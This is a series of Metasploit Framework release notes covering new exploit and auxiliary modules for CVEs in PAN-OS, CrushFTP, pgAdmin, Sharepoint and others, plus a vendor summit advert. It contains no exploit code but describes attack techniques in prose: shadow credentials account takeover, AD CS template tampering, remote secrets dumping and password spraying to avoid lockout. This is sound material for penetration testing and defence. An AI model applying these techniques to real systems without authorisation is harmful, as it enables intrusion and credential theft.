LDAP Authentication Improvements

This week, in Metasploit v6.4.9, the team has added multiple improvements for LDAP related attacks. Two improvements relating to authentication is the new support for Signing and Channel Binding. Microsoft has been making changes to harden the communications to Domain Controllers. Organizations are incorporating these policies which are making LDAP tools without the necessary features unable to operate. The intention behind these changes are to protect communications with Domain Controllers from relay attacks. There are however plenty of scenarios when users may want to authenticate to a domain controller directly with known credentials to perform a variety of tasks.

The new improvements allow Metasploit users to authenticate via either NTLM or Kerberos to LDAP servers with these hardening settings in place. Signing will be performed opportunistically (LDAP::Signing=auto), however it can be either disabled entirely by setting LDAP::Signing to disabled or required with required. Note that setting it to required will raise exceptions with configurations that are incompatible with signing, e.g. connecting over SSL (LDAPS) or using plaintext / simple authentication. At this time channel binding is automatically enabled and can not be disabled in the same way. When connecting over SSL, and authenticating with either NTLM or Kerberos, the binding information is provided to the server.

For users that are unfamiliar with the semi-recent authentication configuration changes introduced in Metasploit v6.3, LDAP modules have an LDAP::Auth option that can be set to one of auto, ntlm, kerberos, schannel, or plaintext.

LDAP Session

In addition to the new LDAP authentication improvements, Metasploit added the latest session type; LDAP sessions this week. Metasploit v6.4 added new protocol-based sessions that allow modules to be run against persistent connections for a variety of services including SMB, MSSQL and MySQL. Once the feature is enabled by running features set ldap_session_type true, users can open sessions with the auxiliary/scanner/ldap/ldap_login module and CreateSession option. These new sessions allow a users to authenticate once and interact with the connection, running queries or modules such as:

• auxiliary/admin/ldap/rbcd – Role Based Constrained Delegation
• auxiliary/admin/ldap/shadow_credentials – Shadow Credentials
• auxiliary/gather/asrep – Find Users Without Pre-Auth Required (ASREP-roast)
• auxiliary/gather/ldap_esc_vulnerable_cert_finder – Misconfigured Certificate Template Finder
• auxiliary/admin/ldap/ad_cs_cert_template – AD CS Certificate Template Management
• auxiliary/gather/ldap_hashdump – LDAP Information Disclosure
• auxiliary/gather/ldap_query – LDAP Query and Enumeration Module

By interacting with the session, the query command becomes available to run queries interactively. It has a few options allowing the scope, attributes and filter to be set.

LDAP (192.0.2.197) > query -h
Usage: query -f <filter string> -a <attributes>

Run the query against the session.

OPTIONS:

    -a, --attributes      Comma separated list of attributes for the query
    -b, --base-dn         Base dn for the query
    -f, --filter          Filter string for the query (default: (objectclass=*))
    -h, --help            Help menu
    -o, --output-format   Output format: `table`, `csv` or `json` (default: table)
    -s, --scope           Scope for the query: `base`, `single`, `whole` (default: whole)

As an example, basic information about the domain can be queried:

LDAP (192.0.2.197) > query -a ms-DS-MachineAccountQuota,objectSID,name -f '(objectClass=domain)'
DC=labs1collabu0,DC=local
=========================

 Name                       Attributes
 ----                       ----------
 ms-ds-machineaccountquota  10
 name                       labs1collabu0
 objectsid                  S-1-5-21-795503-3050334394-3644400624

New module content (2)

Windows Registry Security Descriptor Utility

Author: Christophe De La Fuente
Type: Auxiliary
Pull request: #19115 contributed by cdelafuente-r7
Path: admin/registry_security_descriptor

Description: This adds a module to read and write the security descriptor of Windows registry keys.

Kemp LoadMaster Local sudo privilege escalation

Authors: Dave Yesland with Rhino Security Labs and bwatters-r7
Type: Exploit
Pull request: #19100 contributed by bwatters-r7
Path: linux/local/progress_kemp_loadmaster_sudo_privesc_2024

Description: This adds a privilege escalation exploit module for LoadMaster that abuses the configuration of the sudo command combined with weak file system permissions. There is no CVE for this vulnerability.

Enhancements and features (2)

• #19058 from dwelch-r7 - This adds an LDAP session type allowing users and modules to interact directly with LDAP servers without uploading a payload.
• #19132 from zeroSteiner - Add channel binding information to Metasploit's NTLM and Kerberos authentication for the LDAP protocol. This enables users to authenticate to domain controllers where the hardened security configuration setting is in place.
• #19172 from cgranleese-r7 - Updates the debug command to export the currently enabled user features.

Bugs fixed (1)

• #19183 from adfoster-r7 - Fix windows platform detection bug when running on a UCRT compiled environment.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.8...6.4.9
• Full diff 6.4.8...6.4.9

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Password Spraying support

Multiple bruteforce/login scanner modules have been updated to support a PASSWORD_SPRAY module option. This work was completed in pull request #19079 from nrathaus as well as an additional update from our developers . When the password spraying option is set, the order of attempted users and password attempts are changed.

For example, with the usernames user1, user2, and passwords password1 and password2. The default bruteforce logic will attempt all passwords against the first user, before continuing to the next user:

user1:password1
user1:password2
user2:password1
user2:password2

When the PASSWORD_SPRAY option is set, each password is tried against each username first:

user1:password1
user2:password1
user1:password2
user2:password2

This change of order can be useful as it decreases the risk of account lock out for larger password lists.

New module content (4)

CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read

Authors: Christiaan Beek, jheysel-r7, ma4ter, and yoryio
Type: Auxiliary
Pull request: #19050 contributed by jheysel-r7
Path: gather/coldfusion_pms_servlet_file_read
AttackerKB reference: CVE-2024-20767

Description: This adds an auxiliary module to exploit an Arbitrary File Read Vulnerability in Adobe ColdFusion versions prior to '2023 Update 6' and prior to '2021 Update 12'.

CrushFTP Unauthenticated Arbitrary File Read

Author: remmons-r7
Type: Auxiliary
Pull request: #19147 contributed by remmons-r7
Path: gather/crushftp_fileread_cve_2024_4040
AttackerKB reference: CVE-2024-4040

Description: This adds an exploit module that leverages an unauthenticated server-side template injection vulnerability in CrushFTP versions prior to 10.7.1 and prior to 11.1.0 (as well as legacy 9.x versions) to read any files on the server file system as root.

MSSQL Version Utility

Author: Zach Goldman
Type: Auxiliary
Pull request: #18907 contributed by zgoldman-r7
Path: scanner/mssql/mssql_version

Description: Adds a new auxiliary/scanner/mssql/mssql_version module for fingerprinting Microsoft SQL Server targets.

Docker Privileged Container Kernel Escape

Authors: Eran Ayalon, Ilan Sokol, and Nick Cottrell
Type: Exploit
Pull request: #18519 contributed by rad10
Path: linux/local/docker_privileged_container_kernel_escape

Description: This adds a local exploit that allows Metasploit to escape container environments in which the SYS_MODULE capability is present.

Enhancements and features (3)

• #19125 from zgoldman-r7 - Updates MSSQL platform/arch fingerprinting to be more resilient.
• #19127 from smashery - This implements LDAP signing and encryption for both NTLM and Kerberos.
• #19158 from cgranleese-r7 - Updates multiple login modules to support the PASSWORD_SPRAY datastore option.

Bugs fixed (3)

• #19156 from cgranleese-r7 - Fixes a bug with the PASSWORD_SPRAY support for login scanners were the default username datastore option was not being tried.
• #19159 from cgranleese-r7 - Improves the error detection when detecting platform and arch for PostgreSQL session types.
• #19163 from zeroSteiner - Updates the modules/auxiliary/scanner/smb/smb_version module to support a user defined RPORT. Previously the module was hard-coded to test port 139 and 445.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.7...6.4.8
• Full diff 6.4.7...6.4.8

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Dump secrets inline

This week, our very own cdelafuente-r7 added a significant improvement to the well-known Windows Secrets Dump module to reduce the footprint when dumping SAM hashes, LSA secrets and cached credentials. The module is now directly reading the Windows Registry remotely without having to dump the full registry keys to disk and parse them, like it was originally. This idea comes from this PR proposed by antuache. The technique takes advantage of the WriteDACL privileges held by local administrators to set temporary read permissions on the SAM and SECURITY registry hives. The module also takes care of restoring the original Security Descriptors after each read. Note that it is still possible to use the original technique by setting the INLINE option to false. Happy dumping!

New module content (1)

Kemp LoadMaster Unauthenticated Command Injection

Author: Dave Yesland with Rhino Security Labs
Type: Exploit
Pull request: #18972 contributed by DaveYesland
Path: linux/http/progress_kemp_loadmaster_unauth_cmd_injection
AttackerKB reference: CVE-2024-1212

Description: This adds a module targeting CVE-2024-1212, an unauthenticated command injection vulnerability in Kemp Progress Loadmaster versions after 7.2.48.1, but patched in 7.2.59.2 (GA), 7.2.54.8 (LTSF) and 7.2.48.10 (LTS).

Enhancements and features (3)

• #19048 from cdelafuente-r7 - This updates the windows_secrets_dump module to enable accessing the necessary registry data without writing it to disk first.
• #19075 from ide0x90 - :
  Updates the Softing Secure Integration Server login library to allow the code to be better reused by other modules.
• #19148 from adfoster-r7 - Updates Metasploit-framework to compile on x64-mingw-ucrt platforms.

Bugs fixed (5)

• #19095 from zeroSteiner - Updates the smb_enumusers module to use an updated SMB implementation from RubySMB which fixes an issue where the module could sometimes time out or return an unexpected error when targeting Samba.
• #19137 from zeroSteiner - Fixes an infinite recursion error where Metasploit would attempt to resolve a nameserver specified as a hostname in /etc/resolv.conf while initializing.
• #19138 from dwelch-r7 - Fixes a crash in the cve_2022_26923_certifried module.
• #19141 from jheysel-r7 - This fixes timeout issues encountered by rocketmq and activemq modules that would occur when the target is not running the expected service.
• #19152 from adfoster-r7 - This fixes an issue in the exploit/multi/http/apache_normalize_path_rce exploit module that affected Metasploit Pro due to how the module was handling datastore options.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.6...6.4.7
• Full diff 6.4.6...6.4.7

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Rancher Modules

This week, Metasploit community member h00die added the second of two modules targeting Rancher instances. These modules each leak sensitive information from vulnerable instances of the application which is intended to manage Kubernetes clusters. These are a great addition to Metasploit’s coverage for testing Kubernetes environments.

PAN-OS RCE

Metasploit also released an exploit for the unauthenticated RCE in PAN-OS that has been receiving a lot of attention recently. This vulnerability is an unauthenticated file creation that can be leveraged to trigger the execution of remote commands. See Rapid7’s analysis on AttackerKB for an in depth explanation of the root cause.

New module content (8)

Rancher Authenticated API Credential Exposure

Authors: Florian Struck, Marco Stuurman, and h00die
Type: Auxiliary
Pull request: #18956 contributed by h00die
Path: gather/rancher_authenticated_api_cred_exposure
AttackerKB reference: CVE-2021-36782

Description: This adds an exploit for CVE-2021-36782, a vulnerability which can be leveraged by an authenticated attacker to leak API credentials from an affected Rancher instance.

Gitlab Version Scanner

Author: Julien (jvoisin) Voisin
Type: Auxiliary
Pull request: #18723 contributed by jvoisin
Path: scanner/http/gitlab_version

Description: A web page exists that can be reached without authentication that contains a hash that can be used to determine the approximate version of gitlab running on the endpoint. This PR enhances our current GitLab fingerprinting capabilities to include the aforementioned technique.

Apache Solr Backup/Restore APIs RCE

Authors: jheysel-r7 and l3yx
Type: Exploit
Pull request: #19046 contributed by jheysel-r7
Path: linux/http/apache_solr_backup_restore
AttackerKB reference: CVE-2023-50386

Description: Adds apache_solr_backup_restore module, taking advantage of a Unrestricted Upload of File with Dangerous Type vulnerability, allowing the user to gain a session in an Apache Solr instance for remote code execution.

Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution

Authors: remmons-r7 and sfewer-r7
Type: Exploit
Pull request: #19101 contributed by remmons-r7
Path: linux/http/panos_telemetry_cmd_exec
AttackerKB reference: CVE-2024-3400

Description: This adds an exploit module for https://security.paloaltonetworks.com/CVE-2024-3400, affecting PAN-OS GlobalProtect Gateway and GlobalProtect Portal deployments with the default telemetry service enabled.

GitLens Git Local Configuration Exec

Authors: Paul Gerste and h00die
Type: Exploit
Pull request: #18997 contributed by h00die
Path: multi/fileformat/gitlens_local_config_exec
AttackerKB reference: CVE-2023-46944

Description: This adds a FileFormat exploit for VSCode. The VSCode extension GitLens by GitKraken before v.14.0.0 allows an untrusted workspace to execute git commands. A repo may include its own .git folder including a malicious config file to execute arbitrary code.

Code Reviewer

Author: h00die
Type: Exploit
Pull request: #18996 contributed by h00die
Path: multi/fileformat/visual_studio_vsix_exec

Description: This adds a new exploit module that creates a malicious VS / VSCode extension file.

Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability

Authors: h00die-gr3y h00die.gr3y@gmail.com and usd Herolab
Type: Exploit
Pull request: #19005 contributed by h00die-gr3y
Path: multi/http/gambio_unauth_rce_cve_2024_23759
AttackerKB reference: CVE-2024-23759

Description: This adds a module for a Remote Code Execution vulnerability in Gambio Online Webshop version 4.9.2.0 and lower allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.

FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE

Authors: James Horseman, Spencer McIntyre, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #19082 contributed by jheysel-r7
Path: windows/http/forticlient_ems_fctid_sqli
AttackerKB reference: CVE-2023-48788

Description: Adds windows/http/forticlient_ems_fctid_sqli module that takes advantage of a SQLi injection vulnerability in FortiNet FortiClient EMS.

Enhancements and features (11)

• #17294 from adfoster-r7 - This adds a new EVENT_DEPENDENT value for module reliability metadata.
• #18723 from jvoisin - A web page exists that can be reached without authentication that contains a hash that can be used to determine the approximate version of gitlab running on the endpoint. This PR enhances our current GitLab fingerprinting capabilities to include the aforementioned technique.
• #18914 from dotslashsuperstar - This PR adds functionality so that CVE and URL references will be imported from an OpenVAS XML report by default. DNF-CERT and CERT-BUND references can also be collected by sending additional flags to the db_import command.
• #19054 from zgoldman-r7 - Adds NText column parsing to MSSQL modules.
• #19066 from sjanusz-r7 - Adds automated tests for multiple SMB modules.
• #19078 from dwelch-r7 - Fixes a crash in the modules/auxiliary/gather/ldap_query.rb module when running queries from a file.
• #19080 from cgranleese-r7 - Adds architecture and platform detection for PostgreSQL sessions.
• #19086 from nrathaus - Update Metasploit's RPC to expose module's default_options metadata.
• #19105 from zgoldman-r7 - Updates MSSQL modules to support querying multiple new column types: float, real, money, smallmoney, datetime, smalldatetime, and numeric.
• #19112 from zgoldman-r7 - Adds architecture and platform detection for MSSQL sessions.
• #19122 from h00die - Adds additional reliability metadata to exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.

Bugs fixed (6)

• #19079 from nrathaus - Fixes an issue were the password_spray module option was being ignored.
• #19089 from adfoster-r7 - This PR fixes a bug where a user might get an unexpected NoMethodError running the linux/local/exim4_deliver_message_priv_esc module.
• #19111 from zeroSteiner - This PR fixes a bug where a user can specify an invalid payload architecture for a given exploit target. Previously, it was not possible to tab-complete an invalid payload, but this enforces the architecture limitations with a run-time exception before sending the exploit.
• #19113 from adfoster-r7 - Fixes a regression that caused Metasploit to leak memory, and sometimes crash.
• #19114 from zeroSteiner - This PR fixes several instances where we we pass nil values rather than the types expected, causing crashes and stack traces in LDAP-related modules.
• #19129 from nrathaus - This fixes a bug where the notes command included an example which contained a flag that was not supported.

Documentation added (1)

• #19088 from adfoster-r7 - This PR adds documentation for running and writing Metasploit's unit tests.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.4...6.4.6
• Full diff 6.4.4...6.4.6

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Registration is now open for Take Command, a day-long virtual summit in partnership with AWS. You do not want to miss it. You’ll get new attack intelligence, insight into AI disruption, transparent MDR partnerships, and more.

In 2024, adversaries are using AI and new techniques, working in gangs with nation-state budgets. But it’s “inevitable” they’ll succeed? Really?

Before any talk of surrender, please join us at Take Command. We’ve packed the day with information and insights you can take back to your team and use immediately.

You’ll hear from Chief Scientist Raj Samani, our own Chief Security Officer Jaya Baloo, global security leaders, hands-on practitioners, and Rapid7 Labs leaders like Christiaan Beek and Caitlin Condon. You’ll get a first look at new, emergent research, trends, and intelligence from the curators of Metasploit and our renowned open source communities.

You’ll leave with actionable strategies to safeguard against the newest ransomware, state-sponsored TTPs, and marquee vulnerabilities.

Can’t make the entire day? Check out the agenda, see what fits

The summit kicks off with back-to-back keynotes. First, “Know Your Adversary: Breaking Down the 2024 Attack Intelligence Report” and “The State of Security 2024.”

You’ll get an insider view of Rapid7’s MDR SOC. Sessions range from “Building Defenses Through AI” to “Unlocking Success: Strategies for Measuring Team Performance” to a big favorite “Before, During, & After Ransomware Attacks.” Though no one really talks about it, there’s a lengthy “before” period, and new, good things you can do to frustrate the bad guys.

Take Command will offer strategies on building cybersecurity culture (yes, it’s difficult with humans). And, of course, preparing for the Securities & Exchange Commission's Cybersecurity Disclosure Rules. You’ll hear from Sabeen Malik, VP, Global Government Affairs and Public Policy, Kyra Ayo Caros Director, Corporate Securities & Compliance and Harley L. Geiger, Venable LLP.

Now, turning the tables on attackers is possible

Adversaries are inflicting $10 trillion in damage to the global economy every year , and the goal posts keep moving. As risks from cloud, IoT, AI and quantum computing proliferate and attacks get more frequent, SecOps have never been more stressed. And more in need of sophisticated guidance.

Mark your calendar for May 21. Get details here. You’ll be saving a lot more than the date.

Welcome Ryan and the new CrushFTP module

It's not every week we add an awesome new exploit module to the Framework while adding the original discoverer of the vulnerability to the Rapid7 team as well. We're very excited to welcome Ryan Emmons to the Emergent Threat Response team, which works alongside Metasploit here at Rapid7. Ryan discovered an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in CrushFTP (CVE-2023-43177) versions prior to 10.5.1 which results in unauthenticated remote code execution. Metasploit's very own Christophe De La Fuente did a fantastic job of turning this complex exploit into a smooth running Metasploit module. This release includes another unauthenticated remote code execution vulnerability in the oh so popular PostgreSQL management tool, pgAdmin. Written by Spencer McIntyre, the module exploits CVE-2024-2044 which is a path-traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized.

New module content (3)

MongoDB Ops Manager Diagnostic Archive Sensitive Information Retriever

Author: h00die
Type: Auxiliary
Pull request: #18936 contributed by h00die
Path: gather/mongodb_ops_manager_diagnostic_archive_info
AttackerKB reference: CVE-2023-0342

Description: This adds an auxiliary module that leverages an information disclosure vulnerability (CVE-2023-0342) in MongoDB Ops Manager v5.0 prior to 5.0.21 and v6.0 prior to 6.0.12 to retrieve the SAML SSL Pem Key File Password, which is stored in plaintext in the application's Diagnostics Archive.

CrushFTP Unauthenticated RCE

Authors: Christophe De La Fuente and Ryan Emmons
Type: Exploit
Pull request: #18918 contributed by cdelafuente-r7
Path: multi/http/crushftp_rce_cve_2023_43177
AttackerKB reference: CVE-2023-43177

Description: This exploit module leverages an Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177) to achieve unauthenticated remote code execution. This affects CrushFTP versions prior to 10.5.1.

pgAdmin Session Deserialization RCE

Authors: Abdel Adim Oisfi, Davide Silvetti, and Spencer McIntyre
Type: Exploit
Pull request: #19026 contributed by zeroSteiner
Path: multi/http/pgadmin_session_deserialization
AttackerKB reference: CVE-2024-2044

Description: This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request.

Enhancements and features (0)

None

Bugs fixed (0)

None

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.3...6.4.4
• Full diff 6.4.3...6.4.4

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Account Takeover using Shadow Credentials

The new release of Metasploit Framework includes a Shadow Credentials module added by smashery used for reliably taking over an Active Directory user account or computer, and letting future authentication to happen as that account. This can be chained with other modules present in Metasploit Framework such as windows_secrets_dump.

Details

The module targets a ‘victim’ account that is part of a domain where the Domain Controller is running Windows Server 2016 and newer.

Using an account that has write permissions over another (or its own) user account object, the module adds a public key credential object to the user account's msDS-KeyCredentialLink property. After this, a Ticket Granting Ticket can be requested using the get_ticket module, which subsequently can be used for a pass-the-ticket style attack such as auxiliary/gather/windows_secrets_dump. This can be performed when a user contains the GenericWrite permission over another account. By default, Computer accounts have the ability to write their own value (whereas user accounts do not).

The shadow credentials added persist between password changes, making it a very useful technique for getting the TGT.

The steps for this technique (performed automatically by the module) are:
Generate and store a key and certificate locally
Store the certificate’s public key as a KeyCredential
On the domain controller, update the msDS-KeyCredentialLink property to include the newly generated KeyCredential object

After the above steps, you can:
Obtain a TGT & NTLM hash
Perform further attacks using the above values

New module content (3)

Shadow Credentials

Authors: Elad Shamir and smashery
Type: Auxiliary
Pull request: #19051 contributed by smashery
Path: admin/ldap/shadow_credentials

Description: A new module to add to, list, flush and delete from the LDAP msDS-KeyCredentialLink attribute which enables the user to execute "shadow credential" attacks for persistence and lateral movement.

Gibbon School Platform Authenticated PHP Deserialization Vulnerability

Authors: Ali Maharramli, Fikrat Guliev, Islam Rzayev, and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #19044 contributed by h00die-gr3y
Path: multi/http/gibbon_auth_rce_cve_2024_24725
AttackerKB reference: CVE-2024-24725

Description: An exploit module that exploits Gibbon online school platform version 26.0.00 and lower to achieve remote code execution. Note that authentication is required. This leverages a PHP deserialization attack via columnOrder in a POST request (CVE-2024-24725).

Rancher Audit Log Sensitive Information Leak

Author: h00die
Type: Post
Pull request: #18962 contributed by h00die
Path: linux/gather/rancher_audit_log_leak
AttackerKB reference: CVE-2023-22649

Description: A post module to leverage CVE-2023-22649 which is a sensitive information leak in the rancher service's audit logs.

Enhancements and features (4)

• #19022 from sjanusz-r7 - Adds support to detect the MySQL server's host's platform and arch by running a query.
• #19045 from zgoldman-r7 - Adds a set of acceptance tests for MSSQL modules.
• #19052 from smashery - Updates Metasploit's User Agent strings to values valid for April 2024.
• #19064 from nrathaus - Adds support to the auxiliary/scanner/snmp/snmp_login module to work over the TCP protocol in addition to UDP.

Bugs fixed (3)

• #19056 from dwelch-r7 - Fixed an issue were the socket would be closed if targeting a single host with multiple user_file/pass_file module option combinations. This was caused when a session was successfully opened but then the next login attempt would close the socket being used by the newly created session.
• #19059 from nrathaus - Fixed an issue with the psnuffle module's POP3 support.
• #19069 from adfoster-r7 - Fixed an edgecase present in clients that programmatically interacted with Metasploit's remote procedure call (RPC) functionality that caused the login modules for SMB, Postgres, MySQL, and MSSQL to open a new session by default instead of it being opt in behavior.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.2...6.4.3
• Full diff 6.4.2...6.4.3

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

New ESC4 Templates for AD CS

Metasploit added capabilities for exploiting the ESC family of flaws in AD CS in Metasploit 6.3. The ESC4 technique in particular has been supported for some time now thanks to the ad_cs_cert_templates module which enables users to read and write certificate template objects. This facilitates the exploitation of ESC4 which is a misconfiguration in the access controls of the LDAP object, allowing an attacker to tamper with them. This is typically used by an attacker to modify a certificate template object they are capable of modifying to make it susceptible to ESC1. Metasploit offers a premade template for ESC1 that a user could select to perform this attack.

This attack workflow was expanded on this week with two new templates for ESC2 and ESC3. These new templates allow Metasploit users that are concerned about ESC1 being detected with alternative options for exploitation. Additionally, the premade templates can be edited, to for example restrict permissions to a particular SID by changing the SDDL text of the ntSecurityDescriptor.

New module content (2)

WatchGuard XTM Firebox Unauthenticated Remote Command Execution

Authors: Charles Fol (Ambionics Security), Dylan Pindur (AssetNote), Misterxid, and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18915 contributed by h00die-gr3y
Path: linux/http/watchguard_firebox_unauth_rce_cve_2022_26318
AttackerKB reference: CVE-2022-26318

Description: This PR adds a module for a buffer overflow at the administration interface of WatchGuard Firebox and XTM appliances. The appliances are built from a cherrypy python backend sending XML-RPC requests to a C binary called wgagent using pre-authentication endpoint /agent/login. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.

Jenkins CLI Ampersand Replacement Arbitrary File Read

Authors: Vozec, Yaniv Nizry, binganao, h00die, and h4x0r-dz
Type: Auxiliary
Pull request: #18764 contributed by h00die
Path: gather/jenkins_cli_ampersand_arbitrary_file_read
AttackerKB reference: CVE-2024-23897

Description: This PR adds a new module to exploit CVE-2024-23897, an unauthorized arbitrary (first 2 lines) file read on Jenkins versions prior to 2.442 or for the LTS stream, versions prior to 2.426.3.

Enhancements and features (4)

• #18906 from zeroSteiner - This PR adds support for leveraging the ESC4 attack on misconfigured AD-CS servers to introduce ESC2 and ESC3.
• #18933 from sjanusz-r7 - Updates the new SQL session types to correctly remember previous commands that the user has entered.
• #19003 from ArchiMoebius - Updates msfvenom and payload generation to support formatting payloads as a Zig buffer.
• #19014 from cgranleese-r7 - Adds an initial set of acceptance tests for MySQL modules and session types.

Bugs fixed (3)

• #18935 from zeroSteiner - This PR fixes a common user mistake when authenticating with LDAP modules. Now, users can specify either the USERNAME (user) and DOMAIN (domain.local) datastore options or the original format of just the USERNAME in the UPN format (user@domain.local). This fix updates the LDAP library.
• #19007 from dwelch-r7 - Fixes a regression that affected exploit/multi/http/log4shell_header_injection module which stopped the module from running successfully.
• #19021 from cgranleese-r7 - Updates the admin/mysql/mysql_enum module to work with newer versions of MySQL.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.1...6.4.2
• Full diff 6.4.1...6.4.2

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

PHP code execution and Overshare[point]

Here in the Northern Hemisphere, Spring is in the air: flowers, bees, pollen… a new Metasploit 6.4 release, and now, fresh on the heels of this new release is a bountiful crop of exploits, features, and bug-fixes. Leading the pack is a pair of 2024 PHP code execution vulnerabilities in Artica Proxy and the Bricks Builder WordPress theme, and not to be outshone is a pair of Sharepoint vulnerabilities chained to give unauthenticated code execution as administrator.

New module content (3)

Artica Proxy Unauthenticated PHP Deserialization Vulnerability

Authors: Jaggar Henry of KoreLogic Inc. and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18967 contributed by h00die-gr3y
Path: linux/http/artica_proxy_unauth_rce_cve_2024_2054
AttackerKB reference: CVE-2024-2054

Description: The PR adds a module targeting CVE-2024-2054, a command injection vulnerability in Artica Proxy appliance version 4.50 and 4.40. The exploit allows remote unauthenticated attackers to run arbitrary commands as the www-data user.

Unauthenticated RCE in Bricks Builder Theme

Authors: Calvin Alkan and Valentin Lobstein
Type: Exploit
Pull request: #18891 contributed by Chocapikk
Path: multi/http/wp_bricks_builder_rce
AttackerKB reference: CVE-2024-25600

Description: This PR adds an exploit module that targets a known vulnerability, CVE-2024-25600, in the WordPress Bricks Builder Theme, versions prior to 1.9.6.

Sharepoint Dynamic Proxy Generator Unauth RCE

Authors: Jang and jheysel-r7
Type: Exploit
Pull request: #18721 contributed by jheysel-r7
Path: windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce
AttackerKB reference: CVE-2023-24955

Description: This PR adds a module that allows unauthenticated remote code execution as Administrator on Sharepoint 2019 hosts. It performs this by exploiting two vulnerabilities in Sharepoint 2019. First, it uses CVE-2023-29357, an auth bypass patched in June of 2023 to impersonate the Administrator user, then it uses CVE-2023-24955, an RCE patched in May of 2023 to execute commands as Administrator.

Enhancements and features (4)

• #18925 from sjanusz-r7 - Updates RPC API to include Auxiliary and Exploit modules in session.compatible_modules response.
• #18982 from ekalinichev-r7 - Adds RPC methods session.interactive_read and session.interactive_write that support interaction with SQL, SMB, and Meterpreter sessions via RPC API.
• #19016 from zgoldman-r7 - Updates the MSSQL modules to support the GUID column type. This also improves error logging.
• #19017 from zgoldman-r7 - Improves the auxiliary/admin/mssql/mssql_exec and auxiliary/admin/mssql/mssql_sql modules to have improved error logging.

Bugs fixed (6)

• #18985 from cgranleese-r7 - Fixes store_valid_credential conditional logic for unix/webapp/wp_admin_shell_upload module.
• #18992 from adfoster-r7 - Fixes a crash within the postgres version module.
• #19006 from cgranleese-r7 - This fixes an issue where WMAP plugin module loading was causing failures.
• #19009 from sjanusz-r7 - Updates modules/exploits/osx/local/persistence to no longer be marked as a compatible module for Windows targets.
• #19012 from zeroSteiner - This fixes an issue that was reported where msfconsole will fail to start if the user's /etc/hosts file contained a host name ending in a . or containing _ characters.
• #19015 from zeroSteiner - Previously, we fixed an issue where Metasploit would crash while parsing the hosts file if it ended in unexpected values like . or _. This fixes the same kind of issue in DNS names that enter the hostnames data through a different path by removing any trailing . so they can be used for DNS resolution.

Documentation added (1)

• #18961 from zgoldman-r7 - This adds documentation for the new SQL and SMB session types.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.0...6.4.1
• Full diff 6.4.0...6.4.1

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Today, Metasploit is pleased to announce the release of Metasploit Framework 6.4. It has been just over a year since the release of version 6.3 and the team has added many new features and improvements since then.

For news reporters, please reach out to press@rapid7.com.

Kerberos Improvements

Metasploit 6.3 included initial support for Kerberos authentication within Metasploit and was one of the larger features in the release. Since then, Metasploit has continued to make Kerberos-related improvements, adding capabilities that didn’t make it into the 6.3 cut.

• The auxiliary/admin/kerberos/forge_ticket module was updated with:
  • Support for the diamond and sapphire techniques in addition to the original golden and silver techniques.
